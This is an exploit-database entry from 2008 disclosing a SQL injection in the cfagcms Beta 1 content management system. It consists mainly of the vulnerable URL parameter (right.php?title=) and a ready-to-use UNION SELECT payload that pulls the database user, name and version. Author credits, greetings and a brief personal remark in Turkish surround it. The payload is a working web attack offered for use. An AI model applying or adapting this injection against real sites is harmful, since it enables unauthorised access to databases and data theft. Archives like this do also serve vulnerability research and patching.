exploit-db-mirror/exploits/php/webapps/7483.txt

cfagcms Beta 1 sql inj.

download: http://mesh.dl.sourceforge.net/sourceforge/cfagcms/cfagcms.zip

Discovered By: ZoRLu

z0rlu.blogspot.com

trt-turk@hotmail.com

date: 23.10.2008

N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
------------------------------------------------------------------

exploit:

http://localhost/cfagcms/right.php?title=[SQL]

[SQL]=

ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

------------------------------------------------------------------

thanks: str0ke

a.q kpss

# milw0rm.com [2008-12-15]